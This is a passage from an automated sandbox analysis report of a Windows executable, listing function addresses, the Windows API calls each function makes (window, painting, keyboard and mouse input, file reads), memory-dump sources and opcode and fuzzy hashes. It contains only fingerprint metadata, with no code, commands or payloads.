                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                            • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                            • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                            • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                            Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                            • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3220332590-0
                                                                                                                            • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                            • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                                            • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                            • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                                            Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1612042205-0
                                                                                                                            • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                            • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                                                            • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                            • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                                            Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                            • SendInput.USER32 ref: 0044C6E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2221674350-0
                                                                                                                            • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                            • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                            • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                            • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                            Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$_wcscat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2037614760-0
                                                                                                                            • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                            • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                            • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                            • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                            Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4189319755-0
                                                                                                                            • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                            • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                            • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                            • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                                                            Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1726766782-0
                                                                                                                            • Opcode ID: b495e4daf02a1bd365506ccdf7cb3406510116a3a69ad0e228b01e40eb0a1c70
                                                                                                                            • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                                            • Opcode Fuzzy Hash: b495e4daf02a1bd365506ccdf7cb3406510116a3a69ad0e228b01e40eb0a1c70
                                                                                                                            • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                                                            Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                                            • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 642888154-0
                                                                                                                            • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                            • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                                                            • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                            • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                                                            Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                                            • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1976402638-0
                                                                                                                            • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                            • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                                            • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                            • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                                            Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                              • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                            • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                            • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                            • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4137160315-0
                                                                                                                            • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                            • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                            • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                            • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                                            Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Enable$Show$MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1871949834-0
                                                                                                                            • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                            • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                                                            • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                            • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                                                            Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0044961A
                                                                                                                            • SendMessageW.USER32 ref: 0044964A
                                                                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                                                            • _wcslen.LIBCMT ref: 004496BA
                                                                                                                            • _wcslen.LIBCMT ref: 004496C7
                                                                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1624073603-0
                                                                                                                            • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                            • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                                                            • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                            • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                                                            Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                            • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                                                            • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                            • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                                                            Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1640429340-0
                                                                                                                            • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                            • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                                            • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                            • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                                            Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3354276064-0
                                                                                                                            • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
